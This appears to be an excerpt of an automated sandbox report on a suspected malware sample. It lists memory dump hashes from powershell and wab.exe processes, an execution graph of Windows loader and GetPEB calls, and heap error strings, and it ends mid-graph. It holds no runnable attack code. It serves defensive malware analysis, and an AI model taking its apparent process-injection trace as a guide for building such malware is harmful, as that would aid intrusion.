                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $dq$$dq$$dq$$dq
                                                                    • API String ID: 0-185584874
                                                                    • Opcode ID: 309caea5bc4d2019d39345ac166470be32a17ceb46f12c2a86f931f150c76412
                                                                    • Instruction ID: 1fc30bfb8977060e43f2cd79f67aaf26efbd014bdd7d2ec99e6cdd7d6a0d3f24
                                                                    • Opcode Fuzzy Hash: 309caea5bc4d2019d39345ac166470be32a17ceb46f12c2a86f931f150c76412
                                                                    • Instruction Fuzzy Hash: 99317BF27113226BD7245939AC1173BB6868BC4718F64883EEA01CF7C1DE39DD9183A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $dq$$dq$$dq$$dq
                                                                    • API String ID: 0-185584874
                                                                    • Opcode ID: 21186ef539c03d06bc23eb555c40bd22d83154e94469458d9813b54b5e29d5a5
                                                                    • Instruction ID: a4fbf448e238380eec8f83ad2d599c027e81eda1ea7e57140f33a53ae7517b56
                                                                    • Opcode Fuzzy Hash: 21186ef539c03d06bc23eb555c40bd22d83154e94469458d9813b54b5e29d5a5
                                                                    • Instruction Fuzzy Hash: 122166F2311306ABDF34997AAC00737BAA69BC5715F24947AEB09CB3C1CD75E9848361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,Svl$,Svl$p5fk$xSvl
                                                                    • API String ID: 0-3353569555
                                                                    • Opcode ID: 964f4ec6c8bbb7c0139b0e81ed16b5da43a9666dbde6c4e16c77f814d319303a
                                                                    • Instruction ID: cd9dd5889489a258422d1c95c4b91ed3afe4bb46e95f496037eee535966420fa
                                                                    • Opcode Fuzzy Hash: 964f4ec6c8bbb7c0139b0e81ed16b5da43a9666dbde6c4e16c77f814d319303a
                                                                    • Instruction Fuzzy Hash: 28212CF2700216CBCB209A6AB4012AAF7E6FBD5315F14947AEA0ACBA41DF31C8D1C751
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'dq$4'dq$$dq$$dq
                                                                    • API String ID: 0-4229963660
                                                                    • Opcode ID: 6cb295d681d106bcbc363240882a1aae3b86a6ebd846610156ade56cfe6a5947
                                                                    • Instruction ID: 371817d90c6a008e6cb2633f369dba9c910e512af50cfaea5b7dd10ab5712fb5
                                                                    • Opcode Fuzzy Hash: 6cb295d681d106bcbc363240882a1aae3b86a6ebd846610156ade56cfe6a5947
                                                                    • Instruction Fuzzy Hash: E9F0E9A170152E478E38555D34212A75AE3ABC9602734652EC8415F780CE715DC143C7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:0.2%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:82.9%
                                                                    Total number of Nodes:403
                                                                    Total number of Limit Nodes:13
                                                                    execution_graph 5946 22a133a0 5948 22a133b7 5946->5948 5951 22a13450 5946->5951 5947 22a52a30 GetPEB 5947->5951 5949 22a133fb GetPEB 5948->5949 5950 22a13412 5948->5950 5948->5951 5949->5950 5950->5947 5950->5951 5620 22a762a0 5621 22a762c0 GetPEB 5620->5621 5625 22a762b6 5620->5625 5623 22a762f0 5621->5623 5624 22a76330 GetPEB 5623->5624 5623->5625 5630 22a76342 5623->5630 5624->5625 5626 22a764c5 GetPEB 5626->5625 5627 22a764a4 5627->5626 5637 22a22b60 LdrInitializeThunk 5627->5637 5628 22a76411 GetPEB 5628->5630 5630->5627 5630->5628 5631 22a76467 5630->5631 5635 22a76452 GetPEB 5630->5635 5631->5625 5632 22a7649d 5631->5632 5633 22a7648c GetPEB 5631->5633 5636 22a22b60 LdrInitializeThunk 5632->5636 5633->5632 5635->5630 5636->5627 5637->5626 5638 22a772a0 5641 22a772b8 5638->5641 5639 22a772e8 5640 22a772f0 GetPEB 5639->5640 5642 22a77302 5639->5642 5640->5642 5641->5639 5647 22a22b60 LdrInitializeThunk 5641->5647 5648 22a22b60 LdrInitializeThunk 5642->5648 5644 22a77309 GetPEB 5646 22a77319 5644->5646 5647->5639 5648->5644 6060 22aa132d 6061 22aa134d 6060->6061 6065 22aa1346 6060->6065 6062 22aa151b 6061->6062 6063 22aa150b GetPEB 6061->6063 6064 22aa1525 GetPEB 6062->6064 6062->6065 6063->6062 6064->6065 6066 22a0f32a 6067 22a0f353 6066->6067 6070 22a0f343 6066->6070 6068 22a0f36b GetPEB 6067->6068 6069 22a0f3b6 6067->6069 6068->6070 5649 22aa92a6 5650 22aa92d6 5649->5650 5651 22aa9414 GetPEB 5650->5651 5652 22aa9424 5650->5652 5651->5652 5653 22aa944a GetPEB 5652->5653 5654 22aa9457 5652->5654 5653->5654 5655 22aa9481 5654->5655 5656 22aa945e GetPEB 5654->5656 5656->5655 5657 22aa946d 5656->5657 5657->5655 5658 22aa9476 GetPEB 5657->5658 5658->5655 5787 229d8210 5788 229d8222 5787->5788 5788->5788 5789 229d8237 5788->5789 5791 229d823b 5788->5791 5792 22a3b571 5791->5792 5793 229d824a 5791->5793 5794 229d824f GetPEB 5793->5794 5798 22a22b60 LdrInitializeThunk 5793->5798 5797 229d8260 5794->5797 5796 229d8269 5796->5794 5797->5789 5798->5796 6071 229dc310 6072 229dc31d 6071->6072 6074 229dc341 6071->6074 6073 22a3a02b GetPEB 6072->6073 6072->6074 6073->6074 5799 22a65228 _vswprintf_s 5800 22a6524b 5799->5800 5659 22a042b0 5661 22a042cc 5659->5661 5662 22a04311 5659->5662 5661->5662 5663 22a1a30b 5661->5663 5664 22a1a31f GetPEB 5663->5664 5669 22a1a3b3 5663->5669 5665 22a1a331 5664->5665 5666 22a565b4 GetPEB 5665->5666 5667 22a1a353 5665->5667 5665->5669 5666->5669 5668 22a565cc GetPEB 5667->5668 5667->5669 5668->5669 5669->5662 5801 22a7023b 5802 22a7024e 5801->5802 5803 22a70255 5801->5803 5803->5802 5805 22a22b60 LdrInitializeThunk 5803->5805 5805->5802 6075 229d8300 6078 229d8397 6075->6078 6077 229d8393 6079 229d83b5 GetPEB 6078->6079 6083 229d866a 6078->6083 6080 229d83c8 6079->6080 6081 229d857d GetPEB 6080->6081 6082 22a3b632 GetPEB 6080->6082 6080->6083 6081->6080 6082->6080 6083->6077 6084 22a6933b 6085 22a6934f 6084->6085 6087 22a69354 6084->6087 6088 22a692bc 6085->6088 6089 22a692e7 6088->6089 6090 22a692c5 GetPEB GetPEB 6088->6090 6091 22a69308 6089->6091 6092 22a692ee GetPEB GetPEB 6089->6092 6090->6091 6091->6087 6092->6091 5670 22a0b280 5671 22a0b28f 5670->5671 5674 22a0b2c0 5671->5674 5673 22a0b2b1 5675 22a0b313 5674->5675 5680 22a0b648 5674->5680 5676 22a0b38c GetPEB 5675->5676 5678 22a0b3a2 5675->5678 5675->5680 5676->5678 5677 22a0b6a0 GetPEB 5682 22a0b6b7 5677->5682 5679 22a0b53d GetPEB 5678->5679 5681 22a0b630 5678->5681 5683 22a0b551 5679->5683 5680->5673 5681->5677 5681->5680 5682->5680 5684 22a0b7d1 GetPEB 5682->5684 5685 22a0b7bf GetPEB 5682->5685 5683->5680 5683->5681 5687 22a0b60a GetPEB 5683->5687 5688 22a0b61c GetPEB 5683->5688 5684->5680 5686 22a0b7cd 5685->5686 5686->5684 5689 22a0b618 5687->5689 5688->5681 5689->5688 5956 22a22380 5960 22a223b7 5956->5960 5957 22a22469 5962 22a22b60 LdrInitializeThunk 5957->5962 5960->5957 5963 22a22b60 LdrInitializeThunk 5960->5963 5961 22a22484 5962->5961 5963->5960 6093 229e233a 6094 229e234b 6093->6094 6095 22a3fd24 6093->6095 6098 22a22b60 LdrInitializeThunk 6095->6098 6097 22a3fd3b 6098->6097 5690 22a60283 5691 22a602aa 5690->5691 5692 22a602be 5691->5692 5693 22a602ae GetPEB 5691->5693 5694 22a602cc GetPEB 5692->5694 5697 22a602f4 5692->5697 5693->5692 5695 22a602db 5694->5695 5694->5697 5696 22a602e4 GetPEB 5695->5696 5695->5697 5696->5697 5806 22a17208 5807 22a54546 5806->5807 5810 22a17218 5806->5810 5808 22a5454c GetPEB 5807->5808 5809 22a5455b 5807->5809 5808->5809 5810->5807 5811 22a17232 GetPEB 5810->5811 5811->5807 5812 22a17245 5811->5812 6099 229d7330 6100 229d7344 6099->6100 6102 229d7383 6099->6102 6101 229d735f GetPEB 6100->6101 6100->6102 6101->6102 5813 22a6b208 5814 22a6b256 5813->5814 5816 22a6b289 5814->5816 5817 22a22b60 LdrInitializeThunk 5814->5817 5817->5816 5964 22a0438f 5965 22a043aa 5964->5965 5967 22a4b64e 5964->5967 5966 22a043bb GetPEB 5965->5966 5965->5967 5970 22a043d1 5966->5970 5968 22a04474 GetPEB 5969 22a04485 5968->5969 5970->5967 5970->5968 5702 229f02a0 GetPEB 5703 229f02ad 5702->5703 5704 229f02b3 5702->5704 5704->5703 5705 22a44c67 GetPEB 5704->5705 5818 22aad26b 5820 22aad2c7 5818->5820 5819 22aad426 5820->5819 5821 22aad3af GetPEB 5820->5821 5822 22aad3c9 GetPEB 5820->5822 5821->5820 5822->5820 5610 22a22b60 LdrInitializeThunk 5706 22a912ed 5714 22a91313 5706->5714 5722 22a9169e 5706->5722 5707 22a916ad GetPEB 5711 22a916bd GetPEB 5707->5711 5715 22a916d7 5707->5715 5708 22a918b4 5710 22a918bd GetPEB 5708->5710 5708->5715 5709 22a91824 GetPEB 5712 22a91830 GetPEB 5709->5712 5709->5715 5713 22a918c9 GetPEB 5710->5713 5710->5715 5711->5715 5712->5715 5713->5715 5714->5709 5714->5715 5716 22a917e0 GetPEB 5714->5716 5718 22a916dd GetPEB 5714->5718 5719 22a91774 5714->5719 5714->5722 5724 22a9172d GetPEB 5714->5724 5716->5715 5717 22a917ec GetPEB 5716->5717 5717->5715 5718->5715 5720 22a916e9 GetPEB 5718->5720 5719->5715 5721 22a9177f GetPEB 5719->5721 5720->5715 5721->5715 5723 22a9178b GetPEB 5721->5723 5722->5707 5722->5708 5723->5715 5724->5715 5725 22a91739 GetPEB 5724->5725 5725->5715 5823 229e6259 5824 229e626d 5823->5824 5826 22a40d3d 5823->5826 5825 229e62a2 5824->5825 5827 229e6287 GetPEB 5824->5827 5830 22a22b60 LdrInitializeThunk 5826->5830 5827->5825 5829 22a40d95 5830->5829 5831 22a2d26e 5832 22a2d288 __indefinite 5831->5832 5833 22a2d29c 5831->5833 5834 22a2d299 5832->5834 5833->5832 5839 22a21270 5840 22a21287 5839->5840 5841 22a59c8e 5840->5841 5843 22a212f6 GetPEB 5840->5843 5844 22a2134d 5840->5844 5850 22a22b60 LdrInitializeThunk 5841->5850 5847 22a21309 5843->5847 5845 22a21345 5849 22a22b60 LdrInitializeThunk 5845->5849 5847->5845 5848 22a21334 GetPEB 5847->5848 5848->5845 5849->5844 5850->5844 5853 22a13274 5854 22a13289 5853->5854 5855 22a13297 5854->5855 5857 22a1329e 5854->5857 5859 22a132d4 5857->5859 5858 22a1333f 5858->5855 5859->5858 5860 22a1332c GetPEB 5859->5860 5864 22a22b60 LdrInitializeThunk 5859->5864 5860->5858 5862 22a529e4 GetPEB 5863 22a529f4 5862->5863 5863->5860 5864->5862 5734 229e92c5 5735 229e92fd 5734->5735 5736 22a426ac GetPEB 5735->5736 5737 229e9305 5735->5737 5736->5737 5738 22a426c8 GetPEB 5737->5738 5739 229e9313 5737->5739 5738->5739 5740 229e9358 5739->5740 5742 22a22b60 LdrInitializeThunk 5739->5742 5742->5740 5743 229db2c0 5746 229db2d3 5743->5746 5745 229db2cf 5748 229db2f9 5746->5748 5747 229db3c2 5747->5745 5748->5747 5749 229db365 5748->5749 5750 229db352 GetPEB 5748->5750 5751 229db376 GetPEB 5749->5751 5754 229db39e 5749->5754 5750->5749 5752 229db389 5751->5752 5753 229db395 GetPEB 5752->5753 5752->5754 5753->5754 5754->5745 5865 229d9240 5866 229d927c 5865->5866 5867 22a3bb27 GetPEB 5865->5867 5868 22a3bb47 5867->5868 5869 22a3bb84 GetPEB 5868->5869 5870 22a3bb95 5868->5870 5869->5870 5871 22a90274 5872 22a90280 5871->5872 5873 22a90298 5872->5873 5874 22a906b1 GetPEB 5872->5874 5876 22a90319 5872->5876 5874->5873 5875 22a906bc GetPEB 5874->5875 5875->5873 5877 22a90376 GetPEB 5876->5877 5890 22a903d7 5876->5890 5878 22a90384 5877->5878 5887 22a903f0 5877->5887 5880 22a90389 GetPEB 5878->5880 5885 22a903a3 5878->5885 5879 22a905ad GetPEB 5881 22a905bb 5879->5881 5882 22a90627 5879->5882 5880->5885 5883 22a905c0 GetPEB 5881->5883 5889 22a905da 5881->5889 5882->5873 5884 22a9065a GetPEB 5882->5884 5883->5889 5886 22a90665 GetPEB 5884->5886 5884->5889 5888 22a903c4 GetPEB 5885->5888 5886->5889 5887->5890 5892 22a9048d GetPEB 5887->5892 5888->5890 5891 22a905fe GetPEB 5889->5891 5890->5873 5890->5879 5891->5873 5892->5890 5893 22a90498 GetPEB 5892->5893 5893->5890 5755 22aa02f4 5756 22aa0320 5755->5756 5759 22a22b60 LdrInitializeThunk 5756->5759 5758 22aa0326 5759->5758 5983 229ea3c0 GetPEB 5984 22a42bed 5983->5984 5986 229ea40f 5983->5986 5985 22a42bf6 GetPEB 5984->5985 5984->5986 5985->5986 5987 22a42c12 GetPEB 5986->5987 5996 229ea41d 5986->5996 5987->5996 5988 229ea5ee GetPEB 5989 22a42d0a 5988->5989 5993 229ea603 5988->5993 5990 22a42d13 GetPEB 5989->5990 5989->5993 5990->5993 5991 22a42cfe 5991->5988 5994 22a42d2f GetPEB 5993->5994 5995 229ea611 5993->5995 5994->5995 5996->5988 5996->5991 5997 229ea2c3 GetPEB 5996->5997 5998 22a42b5e 5997->5998 6000 229ea318 5997->6000 5999 22a42b66 GetPEB 5998->5999 5998->6000 5999->6000 6001 22a42b82 GetPEB 6000->6001 6002 229ea328 6000->6002 6001->6002 6003 22a42ba7 GetPEB 6002->6003 6004 229ea3a1 6002->6004 6006 229ea360 6002->6006 6003->6004 6005 22a42bc4 GetPEB 6004->6005 6004->6006 6005->6006 6006->5996 6007 229e83c0 GetPEB 6008 229e83f9 6007->6008 6011 229e8425 6007->6011 6009 229e8411 GetPEB 6008->6009 6008->6011 6009->6011 6010 229e84da GetPEB 6012 229e8514 6010->6012 6013 229e84fa 6010->6013 6011->6010 6011->6012 6013->6012 6014 22a41e88 GetPEB 6013->6014 6014->6012 5760 229d92ff 5761 229d9314 5760->5761 5762 229d934f 5761->5762 5763 229d933b GetPEB 5761->5763 5763->5762 5764 22a622c5 5765 22a6231f 5764->5765 5766 22a622e0 5764->5766 5766->5765 5768 22a22b60 LdrInitializeThunk 5766->5768 5768->5765 5611 22aab242 5612 22aab274 5611->5612 5613 22aab27a 5612->5613 5614 22aab2b3 5612->5614 5618 22a22c70 LdrInitializeThunk 5613->5618 5617 22aab2a6 5614->5617 5619 22a22c70 LdrInitializeThunk 5614->5619 5618->5617 5619->5617 6019 22a063c9 6022 22a0640f 6019->6022 6020 22a06553 6022->6020 6023 22a062ee 6022->6023 6024 22a0630e 6023->6024 6026 22a0632f 6023->6026 6025 22a1a30b 3 API calls 6024->6025 6024->6026 6025->6026 6026->6022 5908 229d7270 5912 229d729a 5908->5912 5914 229d72fb 5908->5914 5909 229d7306 5912->5914 5915 22a9b256 5912->5915 5913 22a3a01b 5913->5913 5914->5909 5921 22a22b60 LdrInitializeThunk 5914->5921 5918 22a9b27f 5915->5918 5920 22a9b2d9 5915->5920 5916 22a9b3a3 GetPEB 5917 22a9b2df 5916->5917 5917->5914 5918->5917 5919 22a9b2c6 GetPEB 5918->5919 5918->5920 5919->5920 5920->5916 5920->5917 5921->5913 5769 22a0f2d0 5770 22a0f2ff 5769->5770 5771 22a50068 GetPEB 5770->5771 5772 22a0f30c 5770->5772 5771->5772 5773 22a5009b GetPEB 5772->5773 5774 22a0f317 5772->5774 5773->5774 6027 22a163d0 6032 22a163ff 6027->6032 6029 22a16434 6030 22a163e1 6030->6029 6031 22a542f6 GetPEB 6030->6031 6034 22a1640e 6032->6034 6033 22a16434 6033->6030 6034->6033 6035 22a542f6 GetPEB 6034->6035 5922 229d826b GetPEB 5923 229d828b 5922->5923 6036 229f03e9 6037 229f0414 6036->6037 6038 22a44ccc GetPEB 6037->6038 6039 229f0421 6037->6039 6038->6039 6042 229f0431 6039->6042 6043 22a44ce8 GetPEB 6039->6043 6040 22a44d04 GetPEB 6044 22a44d17 GetPEB 6040->6044 6041 229f043e 6041->6044 6046 229f0449 6041->6046 6042->6040 6042->6041 6048 22a44d42 6042->6048 6043->6042 6045 22a44d2a 6044->6045 6044->6046 6047 22a44d33 GetPEB 6045->6047 6045->6048 6047->6048 6048->6046 6049 22a44d95 6048->6049 6050 22a44d7c ___swprintf_l 6048->6050 6051 22a44d9f GetPEB 6049->6051 6050->6049 6052 22a44de4 6051->6052 6052->6046 6053 22a44e7c 6052->6053 6054 22a44e6d GetPEB 6052->6054 6055 22a44e92 GetPEB 6053->6055 6054->6053 6055->6046 6056 22a9b3d0 6057 22a9b3e3 6056->6057 6059 22a9b3dc 6056->6059 6058 22a9b3f0 GetPEB 6057->6058 6058->6059 5775 229f02e1 5776 22a44c74 5775->5776 5782 229f0307 5775->5782 5777 22a44c94 GetPEB 5776->5777 5778 229f0367 5776->5778 5777->5778 5779 22a44ca7 GetPEB 5778->5779 5780 229f0375 5778->5780 5779->5780 5781 229f034c GetPEB 5781->5776 5781->5778 5782->5776 5782->5781 5924 229e4260 5925 229e4384 5924->5925 5926 229e4270 5924->5926 5926->5925 5927 229e4285 GetPEB 5926->5927 5927->5925 5928 229e4298 GetPEB 5927->5928 5929 229e42bb 5928->5929 5930 22a4029d GetPEB 5929->5930 5932 229e4327 5929->5932 5933 22a22b60 LdrInitializeThunk 5929->5933 5930->5925 5933->5930 5934 229de262 5935 229de27e 5934->5935 5937 229de2b9 5934->5937 5935->5937 5938 229de388 5935->5938 5939 229de3b8 5938->5939 5945 229de3a4 5938->5945 5940 229de3fe 5939->5940 5941 22a3d9bb GetPEB 5939->5941 5939->5945 5942 22a3d9ce GetPEB 5940->5942 5940->5945 5941->5942 5943 22a3d9e1 5942->5943 5942->5945 5944 22a3d9ea GetPEB 5943->5944 5943->5945 5944->5945 5945->5937

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1 22a22c70-22a22c7c LdrInitializeThunk
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b2752f24d13efd4f32e25f87510f54ab8bb56dd588f1c3a2d40646f2573dffbe
                                                                    • Instruction ID: b916a3998f63753f4459c6d2c53f71d085853636144e4c114ac62f1e9c0fc6c9
                                                                    • Opcode Fuzzy Hash: b2752f24d13efd4f32e25f87510f54ab8bb56dd588f1c3a2d40646f2573dffbe
                                                                    • Instruction Fuzzy Hash: F890023160158806D1117158844474A002547D0301F9AC411E4428658D869589917121
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2 22a22df0-22a22dfc LdrInitializeThunk
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0bdd502c6b46ddd931ef2d660178b94d29b36b2c8b91e09d0b668126e9f295b1
                                                                    • Instruction ID: 8e2435b6244b2d346f6f6f37f6e26e83ef8d1a1dc0de12d83dba44608753b972
                                                                    • Opcode Fuzzy Hash: 0bdd502c6b46ddd931ef2d660178b94d29b36b2c8b91e09d0b668126e9f295b1
                                                                    • Instruction Fuzzy Hash: 8990023160150417D11271584544707002947D0241FD6C412E0428558D96568A52B121
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3 22a235c0-22a235cc LdrInitializeThunk
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 847c82c7458407b496cedb3152e5530094673c445c96c3551c05129ef56cdd4c
                                                                    • Instruction ID: ef2f456d915d46a2d46827159058a0bab9fc400fed0fa35c9d7408a768dc1936
                                                                    • Opcode Fuzzy Hash: 847c82c7458407b496cedb3152e5530094673c445c96c3551c05129ef56cdd4c
                                                                    • Instruction Fuzzy Hash: 32900231A0560406D10171584554706102547D0201FA6C411E0428568D87958A5175A2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 22a22b60-22a22b6c LdrInitializeThunk
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 6ea299be7f106182de91c22e9816438fb1d09c5f0886a2961ea701f4950f5a8a
                                                                    • Instruction ID: 0d9e845e07db93fbe8c6410a7d6bb56ca194c33eff6a080bd139c9f863b8bcf6
                                                                    • Opcode Fuzzy Hash: 6ea299be7f106182de91c22e9816438fb1d09c5f0886a2961ea701f4950f5a8a
                                                                    • Instruction Fuzzy Hash: D890026160250007410671584454616402A47E0201B96C021E1018590DC52589917125
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                    • API String ID: 0-3591852110
                                                                    • Opcode ID: 4c68b1fb6530d10964feece7fb52370dfc6d94d0c9619828ca4230a5cdff3182
                                                                    • Instruction ID: b8c98fea17c88880e392db02b65a3542c6ab4260776932ed2301546186bf13b1
                                                                    • Opcode Fuzzy Hash: 4c68b1fb6530d10964feece7fb52370dfc6d94d0c9619828ca4230a5cdff3182
                                                                    • Instruction Fuzzy Hash: 9412CD35600742DFDB15CF26C590BBABBF1FF49318F148599E5868BAA2D734E880DB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 179 22a90274-22a90296 call 22a37e54 182 22a90298-22a902b0 179->182 183 22a902b5-22a902cd call 229d76b2 179->183 195 22a90751-22a90760 182->195 187 22a902d3-22a902e9 183->187 188 22a906f7 183->188 189 22a902eb-22a902ee 187->189 190 22a902f0-22a902f2 187->190 191 22a906fa-22a9074e call 22a90766 188->191 193 22a902f3-22a9030a 189->193 190->193 191->195 196 22a906b1-22a906ba GetPEB 193->196 197 22a90310-22a90313 193->197 201 22a906d9-22a906de call 229db970 196->201 202 22a906bc-22a906d7 GetPEB call 229db970 196->202 197->196 199 22a90319-22a90322 197->199 204 22a9033e-22a90351 call 22a90cb5 199->204 205 22a90324-22a9033b call 229effb0 199->205 207 22a906e3-22a906f4 call 229db970 201->207 202->207 215 22a9035c-22a90370 call 229d758f 204->215 216 22a90353-22a9035a 204->216 205->204 207->188 219 22a905a2-22a905a7 215->219 220 22a90376-22a90382 GetPEB 215->220 216->215 219->191 223 22a905ad-22a905b9 GetPEB 219->223 221 22a903f0-22a903fb 220->221 222 22a90384-22a90387 220->222 228 22a904e8-22a904fa call 229f27f0 221->228 229 22a90401-22a90408 221->229 224 22a90389-22a903a4 GetPEB call 229db970 222->224 225 22a903a6-22a903ab call 229db970 222->225 226 22a905bb-22a905be 223->226 227 22a90627-22a90632 223->227 240 22a903b0-22a903d1 call 229db970 GetPEB 224->240 225->240 231 22a905dd-22a905e2 call 229db970 226->231 232 22a905c0-22a905db GetPEB call 229db970 226->232 227->191 236 22a90638-22a90643 227->236 251 22a90590-22a9059d call 22a911a4 call 22a90cb5 228->251 252 22a90500-22a90507 228->252 229->228 235 22a9040e-22a90417 229->235 250 22a905e7-22a905fb call 229db970 231->250 232->250 243 22a90419-22a90429 235->243 244 22a90438-22a9043c 235->244 236->191 237 22a90649-22a90654 236->237 237->191 245 22a9065a-22a90663 GetPEB 237->245 240->228 270 22a903d7-22a903eb 240->270 243->244 253 22a9042b-22a90435 call 22a9dac6 243->253 246 22a9044e-22a90454 244->246 247 22a9043e-22a9044c call 22a13bc9 244->247 254 22a90682-22a90687 call 229db970 245->254 255 22a90665-22a90680 GetPEB call 229db970 245->255 257 22a90457-22a90460 246->257 247->257 282 22a905fe-22a90608 GetPEB 250->282 251->219 260 22a90509-22a90510 252->260 261 22a90512-22a9051a 252->261 253->244 279 22a9068c-22a906ac call 22a886ba call 229db970 254->279 255->279 268 22a90472-22a90475 257->268 269 22a90462-22a90470 257->269 260->261 272 22a90538-22a9053c 261->272 273 22a9051c-22a9052c 261->273 280 22a904e5 268->280 281 22a90477-22a9047e 268->281 269->268 270->228 276 22a9056c-22a90572 272->276 277 22a9053e-22a90551 call 22a13bc9 272->277 273->272 283 22a9052e-22a90533 call 